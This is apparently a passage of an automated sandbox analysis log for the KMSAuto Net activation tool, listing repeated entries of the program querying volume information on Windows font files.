              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
